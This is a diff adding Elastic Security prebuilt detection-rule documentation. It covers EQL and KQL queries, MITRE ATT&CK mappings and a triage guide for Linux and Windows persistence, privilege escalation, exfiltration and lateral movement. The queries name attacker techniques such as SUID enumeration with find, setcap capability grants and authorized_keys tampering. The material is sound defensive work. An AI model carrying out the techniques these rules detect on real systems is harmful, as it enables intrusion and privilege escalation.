ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Regsvr32 +** ID: T1218.010 +** Reference URL: https://attack.mitre.org/techniques/T1218/010/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-setcap-setuid-setgid-capability-set.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-setcap-setuid-setgid-capability-set.asciidoc new file mode 100644 index 0000000000..d696f8b10d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-setcap-setuid-setgid-capability-set.asciidoc @@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-setcap-setuid-setgid-capability-set]] +=== Setcap setuid/setgid Capability Set + +This rule monitors for the addition of the cap_setuid+ep or cap_setgid+ep capabilities via setcap. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to achieve persistence by creating malicious binaries, allowing them to maintain control over a compromised system with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "setcap" and process.args : "cap_set?id+ep" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Setuid and Setgid +** ID: T1548.001 +** Reference URL: https://attack.mitre.org/techniques/T1548/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-shared-object-created-or-changed-by-previously-unknown-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-shared-object-created-or-changed-by-previously-unknown-process.asciidoc new file mode 100644 index 0000000000..40d5ee8442 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-shared-object-created-or-changed-by-previously-unknown-process.asciidoc @@ -0,0 +1,70 @@ +[[prebuilt-rule-8-10-5-shared-object-created-or-changed-by-previously-unknown-process]] +=== Shared Object Created or Changed by Previously Unknown Process + +This rule monitors the creation of shared object files by previously unknown processes. The creation of a shared object file involves compiling code into a dynamically linked library that can be loaded by other programs at runtime. While this process is typically used for legitimate purposes, malicious actors can leverage shared object files to execute unauthorized code, inject malicious functionality into legitimate processes, or bypass security controls. This allows malware to persist on the system, evade detection, and potentially compromise the integrity and confidentiality of the affected system and its data. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://threatpost.com/sneaky-malware-backdoors-linux/180158/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.action:(creation or file_create_event or file_rename_event or rename) and +file.path:(/dev/shm/* or /usr/lib/*) and file.extension:so and +process.name: ( * and not ("5" or "dockerd" or "dpkg" or "rpm" or "snapd" or "exe" or "yum" or "vmis-launcher" + or "pacman" or "apt-get" or "dnf")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Dynamic Linker Hijacking +** ID: T1574.006 +** Reference URL: https://attack.mitre.org/techniques/T1574/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-solarwinds-process-disabling-services-via-registry.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-solarwinds-process-disabling-services-via-registry.asciidoc new file mode 100644 index 0000000000..fd71bcf62b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-solarwinds-process-disabling-services-via-registry.asciidoc @@ -0,0 +1,106 @@ +[[prebuilt-rule-8-10-5-solarwinds-process-disabling-services-via-registry]] +=== SolarWinds Process Disabling Services via Registry + +Identifies a SolarWinds binary modifying the start type of a service to be disabled. An adversary may abuse this technique to manipulate relevant security services. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Initial Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and registry.path : ( + "HKLM\\SYSTEM\\*ControlSet*\\Services\\*\\Start", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Services\\*\\Start" + ) and + registry.data.strings : ("4", "0x00000004") and + process.name : ( + "SolarWinds.BusinessLayerHost*.exe", + "ConfigurationWizard*.exe", + "NetflowDatabaseMaintenance*.exe", + "NetFlowService*.exe", + "SolarWinds.Administration*.exe", + "SolarWinds.Collector.Service*.exe", + "SolarwindsDiagnostics*.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Supply Chain Compromise +** ID: T1195 +** Reference URL: https://attack.mitre.org/techniques/T1195/ +* Sub-technique: +** Name: Compromise Software Supply Chain +** ID: T1195.002 +** Reference URL: https://attack.mitre.org/techniques/T1195/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc new file mode 100644 index 0000000000..7fc9d978f6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc @@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device-via-airdrop]] +=== Spike in Bytes Sent to an External Device via Airdrop + +A machine learning job has detected high bytes of data written to an external device via Airdrop. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-2h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Other Network Medium +** ID: T1011 +** Reference URL: https://attack.mitre.org/techniques/T1011/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device.asciidoc new file mode 100644 index 0000000000..8d98094589 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device.asciidoc @@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device]] +=== Spike in Bytes Sent to an External Device + +A machine learning job has detected high bytes of data written to an external device. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-2h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Physical Medium +** ID: T1052 +** Reference URL: https://attack.mitre.org/techniques/T1052/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ssh-authorized-keys-file-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ssh-authorized-keys-file-modification.asciidoc new file mode 100644 index 0000000000..71da98a49e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ssh-authorized-keys-file-modification.asciidoc @@ -0,0 +1,100 @@ +[[prebuilt-rule-8-10-5-ssh-authorized-keys-file-modification]] +=== SSH Authorized Keys File Modification + +The Secure Shell (SSH) authorized_keys file specifies which users are allowed to log into a server using public key authentication. Adversaries may modify it to maintain persistence on a victim host by adding their own public key(s). + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: macOS +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Tactic: Persistence +* Data Source: Elastic Defend + +*Version*: 204 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:file and event.type:(change or creation) and + file.name:("authorized_keys" or "authorized_keys2" or "/etc/ssh/sshd_config" or "/root/.ssh") and + not process.executable: + (/Library/Developer/CommandLineTools/usr/bin/git or + /usr/local/Cellar/maven/*/libexec/bin/mvn or + /Library/Java/JavaVirtualMachines/jdk*.jdk/Contents/Home/bin/java or + /usr/bin/vim or + /usr/local/Cellar/coreutils/*/bin/gcat or + /usr/bin/bsdtar or + /usr/bin/nautilus or + /usr/bin/scp or + /usr/bin/touch or + /var/lib/docker/* or + /usr/bin/google_guest_agent or + /opt/jc/bin/jumpcloud-agent) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: SSH Authorized Keys +** ID: T1098.004 +** Reference URL: https://attack.mitre.org/techniques/T1098/004/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Service Session Hijacking +** ID: T1563 +** Reference URL: https://attack.mitre.org/techniques/T1563/ +* Sub-technique: +** Name: SSH Hijacking +** ID: T1563.001 +** Reference URL: https://attack.mitre.org/techniques/T1563/001/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SSH +** ID: T1021.004 +** Reference URL: https://attack.mitre.org/techniques/T1021/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-startup-folder-persistence-via-unsigned-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-startup-folder-persistence-via-unsigned-process.asciidoc new file mode 100644 index 0000000000..38782da9fc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-startup-folder-persistence-via-unsigned-process.asciidoc @@ -0,0 +1,153 @@ +[[prebuilt-rule-8-10-5-startup-folder-persistence-via-unsigned-process]] +=== Startup Folder Persistence via Unsigned Process + +Identifies files written or modified in the startup folder by unsigned processes. Adversaries may abuse this technique to maintain persistence in an environment. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Startup Folder Persistence via Unsigned Process + +The Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence. + +This rule looks for unsigned processes writing to the Startup folder locations. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign. + +### Related rules + +- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff +- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=5s + [process where host.os.type == "windows" and event.type == "start" and process.code_signature.trusted == false and + /* suspicious paths can be added here */ + process.executable : ("C:\\Users\\*.exe", + "C:\\ProgramData\\*.exe", + "C:\\Windows\\Temp\\*.exe", + "C:\\Windows\\Tasks\\*.exe", + "C:\\Intel\\*.exe", + "C:\\PerfLogs\\*.exe") + ] + [file where host.os.type == "windows" and event.type != "deletion" and user.domain != "NT AUTHORITY" and + file.path : ("C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", + "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\*") + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Registry Run Keys / Startup Folder +** ID: T1547.001 +** Reference URL: https://attack.mitre.org/techniques/T1547/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudo-command-enumeration-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudo-command-enumeration-detected.asciidoc new file mode 100644 index 0000000000..0e2f5f073b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudo-command-enumeration-detected.asciidoc @@ -0,0 +1,62 @@ +[[prebuilt-rule-8-10-5-sudo-command-enumeration-detected]] +=== Sudo Command Enumeration Detected + +This rule monitors for the usage of the sudo -l command, which is used to list the allowed and forbidden commands for the invoking user. Attackers may execute this command to enumerate commands allowed to be executed with sudo permissions, potentially allowing to escalate privileges to root. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and +process.name == "sudo" and process.args == "-l" and process.args_count == 2 and +process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and +not group.Ext.real.id : "0" and not user.Ext.real.id : "0" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: System Owner/User Discovery +** ID: T1033 +** Reference URL: https://attack.mitre.org/techniques/T1033/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudoers-file-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudoers-file-modification.asciidoc new file mode 100644 index 0000000000..1b31d0409b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudoers-file-modification.asciidoc @@ -0,0 +1,65 @@ +[[prebuilt-rule-8-10-5-sudoers-file-modification]] +=== Sudoers File Modification + +A sudoers file specifies the commands that users or groups can run and from which terminals. Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: macOS +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend + +*Version*: 203 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:file and event.type:change and file.path:(/etc/sudoers* or /private/etc/sudoers*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Sudo and Sudo Caching +** ID: T1548.003 +** Reference URL: https://attack.mitre.org/techniques/T1548/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suid-sguid-enumeration-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suid-sguid-enumeration-detected.asciidoc new file mode 100644 index 0000000000..891f5dccc7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suid-sguid-enumeration-detected.asciidoc @@ -0,0 +1,82 @@ +[[prebuilt-rule-8-10-5-suid-sguid-enumeration-detected]] +=== SUID/SGUID Enumeration Detected + +This rule monitors for the usage of the "find" command in conjunction with SUID and SGUID permission arguments. SUID (Set User ID) and SGID (Set Group ID) are special permissions in Linux that allow a program to execute with the privileges of the file owner or group, respectively, rather than the privileges of the user running the program. In case an attacker is able to enumerate and find a binary that is misconfigured, they might be able to leverage this misconfiguration to escalate privileges by exploiting vulnerabilities or built-in features in the privileged program. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Tactic: Privilege Escalation +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and +process.name == "find" and process.args : "-perm" and process.args : ( + "/6000", "-6000", "/4000", "-4000", "/2000", "-2000", "/u=s", "-u=s", "/g=s", "-g=s", "/u=s,g=s", "/g=s,u=s" +) and not ( + user.Ext.real.id == "0" or group.Ext.real.id == "0" or process.args_count >= 12 or + (process.args : "/usr/bin/pkexec" and process.args : "-xdev" and process.args_count == 7) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: File and Directory Discovery +** ID: T1083 +** Reference URL: https://attack.mitre.org/techniques/T1083/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Setuid and Setgid +** ID: T1548.001 +** Reference URL: https://attack.mitre.org/techniques/T1548/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-cmd-execution-via-wmi.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-cmd-execution-via-wmi.asciidoc new file mode 100644 index 0000000000..18f7ac4c13 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-cmd-execution-via-wmi.asciidoc @@ -0,0 +1,81 @@ +[[prebuilt-rule-8-10-5-suspicious-cmd-execution-via-wmi]] +=== Suspicious Cmd Execution via WMI + +Identifies suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "WmiPrvSE.exe" and process.name : "cmd.exe" and + process.args : "\\\\127.0.0.1\\*" and process.args : ("2>&1", "1>") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: 